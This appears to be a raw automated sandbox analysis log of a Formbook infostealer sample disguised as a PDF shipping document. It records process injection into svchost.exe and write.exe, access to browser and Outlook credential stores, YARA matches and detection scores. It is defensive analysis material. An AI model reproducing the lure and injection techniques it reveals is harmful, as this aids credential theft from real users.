            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045B4F406_2_045B4F40
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045FFF096_2_045FFF09
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04560F306_2_04560F30
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04582F286_2_04582F28
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04532FC86_2_04532FC8
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04541F926_2_04541F92
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045FFFB16_2_045FFFB1
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045428406_2_04542840
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0454A8406_2_0454A840
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045AD8006_2_045AD800
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0456E8F06_2_0456E8F0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045438E06_2_045438E0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045268B86_2_045268B8
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045499506_2_04549950
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0455B9506_2_0455B950
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045569626_2_04556962
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0460A9A66_2_0460A9A6
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045429A06_2_045429A0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045FFA496_2_045FFA49
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045F7A466_2_045F7A46
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045B3A6C6_2_045B3A6C
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045EDAC66_2_045EDAC6
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0453EA806_2_0453EA80
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045DDAAC6_2_045DDAAC
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04585AA06_2_04585AA0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045FAB406_2_045FAB40
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045FFB766_2_045FFB76
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045F6BD76_2_045F6BD7
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045B5BF06_2_045B5BF0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0457DBF96_2_0457DBF9
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0455FB806_2_0455FB80
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_023C1A106_2_023C1A10
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_023C32A06_2_023C32A0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_023C329C6_2_023C329C
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_023C50D06_2_023C50D0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_023DB6406_2_023DB640
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_023BCB506_2_023BCB50
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_023BABD06_2_023BABD0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_023BC9306_2_023BC930
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_023BC9286_2_023BC928
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_043AE4466_2_043AE446
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_043AE5636_2_043AE563
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_043ACC086_2_043ACC08
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_043AE8FD6_2_043AE8FD
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_043AD9686_2_043AD968
            Source: C:\Windows\SysWOW64\write.exeCode function: String function: 04575130 appears 36 times
            Source: C:\Windows\SysWOW64\write.exeCode function: String function: 0452B970 appears 250 times
            Source: C:\Windows\SysWOW64\write.exeCode function: String function: 045AEA12 appears 86 times
            Source: C:\Windows\SysWOW64\write.exeCode function: String function: 04587E54 appears 93 times
            Source: C:\Windows\SysWOW64\write.exeCode function: String function: 045BF290 appears 103 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03C75130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03C2B970 appears 262 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03C87E54 appears 107 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03CAEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03CBF290 appears 103 times
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeCode function: String function: 00445975 appears 65 times
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeCode function: String function: 0041171A appears 37 times
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeCode function: String function: 0041718C appears 44 times
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeCode function: String function: 0040E6D0 appears 35 times
            Source: Bill Of Lading_MEDUVB935991.pdf.exe, 00000000.00000003.1750552706.00000000049DD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Bill Of Lading_MEDUVB935991.pdf.exe
            Source: Bill Of Lading_MEDUVB935991.pdf.exe, 00000000.00000003.1740156256.0000000004833000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Bill Of Lading_MEDUVB935991.pdf.exe
            Source: Bill Of Lading_MEDUVB935991.pdf.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.4198403561.00000000042A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.4198331261.0000000005AF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.4200186991.00000000050F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.2196592911.0000000003AD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.2197276095.0000000006A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.4197079082.00000000023B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.4198283199.0000000004110000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.2195135804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@14/11
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeCode function: 0_2_0044AF5C GetLastError,FormatMessageW,0_2_0044AF5C
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeCode function: 0_2_00464422 OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,0_2_00464422
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeCode function: 0_2_004364AA GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004364AA
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeCode function: 0_2_0045D517 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode,0_2_0045D517
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeCode function: 0_2_0043701F CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,__wcsicoll,CloseHandle,0_2_0043701F
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeCode function: 0_2_0047A999 OleInitialize,CLSIDFromProgID,CoCreateInstance,CoInitializeSecurity,_memset,_wcslen,_memset,CoCreateInstanceEx,CoSetProxyBlanket,0_2_0047A999
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeCode function: 0_2_0043614F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,0_2_0043614F
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeFile created: C:\Users\user\AppData\Local\Temp\slashingJump to behavior
            Source: Bill Of Lading_MEDUVB935991.pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: write.exe, 00000006.00000003.2372737299.0000000002903000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000006.00000003.2372606436.00000000028E1000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000006.00000002.4197383900.0000000002903000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: Bill Of Lading_MEDUVB935991.pdf.exeReversingLabs: Detection: 55%
            Source: Bill Of Lading_MEDUVB935991.pdf.exeVirustotal: Detection: 56%
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeFile read: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe "C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe"
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe"
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exeProcess created: C:\Windows\SysWOW64\write.exe "C:\Windows\SysWOW64\write.exe"
            Source: C:\Windows\SysWOW64\write.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe | Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe | Section loaded: wsock32.dll
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe | Section loaded: version.dll
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe | Section loaded: winmm.dll
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe | Section loaded: mpr.dll
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe | Section loaded: wininet.dll
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe | Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe | Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\write.exe | Section loaded: wininet.dll
            Source: C:\Windows\SysWOW64\write.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\write.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\write.exe | Section loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\write.exe | Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\write.exe | Section loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\write.exe | Section loaded: version.dll
            Source: C:\Windows\SysWOW64\write.exe | Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\write.exe | Section loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\write.exe | Section loaded: wkscli.dll
            Source: C:\Windows\SysWOW64\write.exe | Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\write.exe | Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\write.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\write.exe | Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\write.exe | Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\write.exe | Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\write.exe | Section loaded: mlang.dll
            Source: C:\Windows\SysWOW64\write.exe | Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\write.exe | Section loaded: winsqlite3.dll
            Source: C:\Windows\SysWOW64\write.exe | Section loaded: vaultcli.dll
            Source: C:\Windows\SysWOW64\write.exe | Section loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\write.exe | Section loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\write.exe | Section loaded: cryptbase.dll
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe | Section loaded: wininet.dll
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe | Section loaded: mswsock.dll
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe | Section loaded: dnsapi.dll
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe | Section loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe | Section loaded: fwpuclnt.dll
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe | Section loaded: rasadhlp.dll
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
            Source: Window Recorder | Window detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\write.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: Bill Of Lading_MEDUVB935991.pdf.exe | Static file information: File size 1326841 > 1048576
            Source: Binary string: write.pdbGCTL source: svchost.exe, 00000001.00000002.2196173026.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2196201954.0000000003619000.00000004.00000020.00020000.00000000.sdmp, gNKNuXuipEBZec.exe, 00000005.00000002.4197765799.000000000176E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: write.pdb source: svchost.exe, 00000001.00000002.2196173026.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2196201954.0000000003619000.00000004.00000020.00020000.00000000.sdmp, gNKNuXuipEBZec.exe, 00000005.00000002.4197765799.000000000176E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: gNKNuXuipEBZec.exe, 00000005.00000002.4197078176.000000000020E000.00000002.00000001.01000000.00000005.sdmp, gNKNuXuipEBZec.exe, 00000007.00000000.2262529578.000000000020E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: Bill Of Lading_MEDUVB935991.pdf.exe, 00000000.00000003.1739800733.00000000048B0000.00000004.00001000.00020000.00000000.sdmp, Bill Of Lading_MEDUVB935991.pdf.exe, 00000000.00000003.1739474867.0000000004710000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2196687100.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2094619332.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2092717586.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2196687100.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, write.exe, 00000006.00000002.4198585467.000000000469E000.00000040.00001000.00020000.00000000.sdmp, write.exe, 00000006.00000002.4198585467.0000000004500000.00000040.00001000.00020000.00000000.sdmp, write.exe, 00000006.00000003.2195652976.00000000041AF000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000006.00000003.2197425924.0000000004352000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Bill Of Lading_MEDUVB935991.pdf.exe, 00000000.00000003.1739800733.00000000048B0000.00000004.00001000.00020000.00000000.sdmp, Bill Of Lading_MEDUVB935991.pdf.exe, 00000000.00000003.1739474867.0000000004710000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.2196687100.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2094619332.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2092717586.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2196687100.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, write.exe, write.exe, 00000006.00000002.4198585467.000000000469E000.00000040.00001000.00020000.00000000.sdmp, write.exe, 00000006.00000002.4198585467.0000000004500000.00000040.00001000.00020000.00000000.sdmp, write.exe, 00000006.00000003.2195652976.00000000041AF000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000006.00000003.2197425924.0000000004352000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: write.exe, 00000006.00000002.4197383900.0000000002885000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000006.00000002.4199021096.0000000004B2C000.00000004.10000000.00040000.00000000.sdmp, gNKNuXuipEBZec.exe, 00000007.00000002.4198548934.0000000002CBC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2482548327.0000000037CAC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: write.exe, 00000006.00000002.4197383900.0000000002885000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000006.00000002.4199021096.0000000004B2C000.00000004.10000000.00040000.00000000.sdmp, gNKNuXuipEBZec.exe, 00000007.00000002.4198548934.0000000002CBC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2482548327.0000000037CAC000.00000004.80000000.00040000.00000000.sdmp
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe -- Code function: 0_2_0040EB70 LoadLibraryA,GetProcAddress -- 0_2_0040EB70
            Source: Bill Of Lading_MEDUVB935991.pdf.exe -- Static PE information: real checksum: 0xa2135 should be: 0x151d03
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe -- Code function: 0_2_004171D1 push ecx; ret -- 0_2_004171E4
            Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 1_2_0041433C push eax; retn 5C94h -- 1_2_00414328
            Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 1_2_00408810 push E8C19C57h; retf -- 1_2_00408817
            Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 1_2_00402221 push edi; retf -- 1_2_00402235
            Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 1_2_00411A9A push 797FD1CCh; iretd -- 1_2_00411ABD
            Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 1_2_004122A3 push ebx; retf -- 1_2_004122A6
            Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 1_2_00406BC7 push es; ret -- 1_2_00406BCD
            Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 1_2_0040745F push esp; retf -- 1_2_00407466
            Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 1_2_0041EC0F push eax; iretd -- 1_2_0041EC15
            Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 1_2_004034B0 push eax; ret -- 1_2_004034B2
            Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 1_2_0040D563 push 4EF1F631h; retf -- 1_2_0040D573
            Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 1_2_0040D532 push esi; retf -- 1_2_0040D544
            Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 1_2_00415DC3 push esi; ret -- 1_2_00415DCE
            Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 1_2_00413D93 push 2370h; ret -- 1_2_00413DC7
            Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 1_2_0041A59C push cs; ret -- 1_2_0041A5A2
            Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 1_2_00419E9A push esp; ret -- 1_2_00419E9F
            Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 1_2_03C0225F pushad ; ret -- 1_2_03C027F9
            Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 1_2_03C027FA pushad ; ret -- 1_2_03C027F9
            Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 1_2_03C309AD push ecx; mov dword ptr [esp], ecx -- 1_2_03C309B6
            Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 1_2_03C0283D push eax; iretd -- 1_2_03C02858
            Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 1_2_03C01368 push eax; iretd -- 1_2_03C01369
            Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 1_2_03C01065 push edi; ret -- 1_2_03C0108A
            Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 1_2_03C018F3 push edx; iretd -- 1_2_03C01906
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe -- Code function: 5_2_05B20CE0 push esp; ret -- 5_2_05B20CE5
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe -- Code function: 5_2_05B11C30 push edi; iretd -- 5_2_05B11C23
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe -- Code function: 5_2_05B1CC02 push esi; ret -- 5_2_05B1CC14
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe -- Code function: 5_2_05B1CC09 push esi; ret -- 5_2_05B1CC14
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe -- Code function: 5_2_05B0F656 push E8C19C57h; retf -- 5_2_05B0F65D
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe -- Code function: 5_2_05B1C985 push eax; iretd -- 5_2_05B1C986
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe -- Code function: 5_2_05B188E0 push 797FD1CCh; iretd -- 5_2_05B18903
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe -- Code function: 5_2_05B190E9 push ebx; retf -- 5_2_05B190EC

